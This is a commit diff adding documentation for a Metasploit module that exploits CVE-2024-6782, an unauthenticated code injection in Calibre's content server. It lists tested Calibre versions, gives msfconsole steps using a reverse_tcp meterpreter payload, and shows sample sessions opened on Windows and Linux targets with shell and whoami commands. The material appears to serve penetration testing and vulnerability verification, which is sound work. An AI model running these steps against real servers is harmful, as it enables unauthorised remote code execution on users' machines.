Documentation for Exploit Module Calibre Python Code Injection (CVE-2024-6782)

h4x-x0r · h4x-x0r · commit 6aa4d2e80636 · 2024-08-01T23:56:33.000-04:00
diff --git a/documentation/modules/exploit/multi/misc/calibre_exec.md b/documentation/modules/exploit/multi/misc/calibre_exec.md
@@ -0,0 +1,106 @@
+## Vulnerable Application
+
+**Vulnerability Description**
+
+This module exploits a vulnerability in Calibre <= v6.9.0 - v7.14.0 (CVE-2024-6782).
+
+An unauthenticated remote attacker can exploit this vulnerability to gain arbitrary code execution in the context of which Calibre is being
+executed.
+
+All versions between v6.9.0 - v7.14.0 are affected. STAR Labs published [an advisory](https://starlabs.sg/advisories/24/24-6782/) that
+includes the root cause analysis and a proof-of-concept.
+
+**Vulnerable Application Installation**
+
+Calibre can be downloaded from [here](https://download.calibre-ebook.com/).
+
+**Successfully tested on**
+
+Windows:
+- Calibre v7.14 on Windows 10 22H2
+- Calibre v7.0 on Windows 10 22H2
+- Calibre v6.29 on Windows 10 22H2
+- Calibre v6.9 on Windows 10 22H2
+
+Linux:
+- Calibre v7.14 on Ubuntu 24.04 LTS
+- Calibre v7.0 on Ubuntu 24.04 LTS
+- Calibre v6.29 on Ubuntu 24.04 LTS
+- Calibre v6.9 on Ubuntu 24.04 LTS
+
+## Verification Steps
+
+1. Install Calibre
+2. Start Calibre and click Connect/share > Start Content server
+3. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use exploit/multi/misc/calibre_exec
+[*] Using configured payload cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/misc/calibre_exec) > set RHOSTS <IP>
+msf6 exploit(multi/misc/calibre_exec) > set LHOST <IP>
+msf6 exploit(multi/misc/calibre_exec) > exploit
+```
+
+You should get a meterpreter session running in the same context as the Calibre application.
+
+## Scenarios
+
+**Windows**
+
+Running the exploit against Calibre v7.14 on Windows 10 22H2, using curl as a fetch command, should result in an output similar to the
+following:
+
+```
+msf6 exploit(multi/misc/calibre_exec) > exploit 
+
+[*] Started reverse TCP handler on 192.168.137.190:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Sending payload...
+[*] Sending stage (201798 bytes) to 192.168.137.194
+[*] Meterpreter session 1 opened (192.168.137.190:4444 -> 192.168.137.194:50346) at 2024-08-01 23:28:16 -0400
+[*] Exploit finished, check thy shell.
+
+meterpreter > sysinfo
+Computer        : DESKTOP-foo
+OS              : Windows 10 (10.0 Build 19045).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+
+meterpreter > shell
+Process 6084 created.
+Channel 1 created.
+Microsoft Windows [Version 10.0.19045.4529]
+(c) Microsoft Corporation. All rights reserved.
+
+C:\Program Files\Calibre2>whoami
+whoami
+desktop-foo\admin
+```
+
+**Linux**
+
+Running the exploit against Calibre v7.14 on Ubuntu 24.04 LTS, using cmd/unix/python/meterpreter/reverse_tcp as a payload, should result in
+an output similar to the following:
+
+```
+msf6 exploit(multi/misc/calibre_exec) > exploit 
+
+[ *] Started reverse TCP handler on 192.168.137.190:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Sending payload...
+[*] Sending stage (24772 bytes) to 192.168.137.195
+[*] Meterpreter session 2 opened (192.168.137.190:4444 -> 192.168.137.195:52376) at 2024-08-01 23:40:16 -0400
+
+meterpreter > sysinfo
+Computer        : asdfvm
+OS              : Linux 6.8.0-39-generic #39-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul  5 21:49:14 UTC 2024
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+```
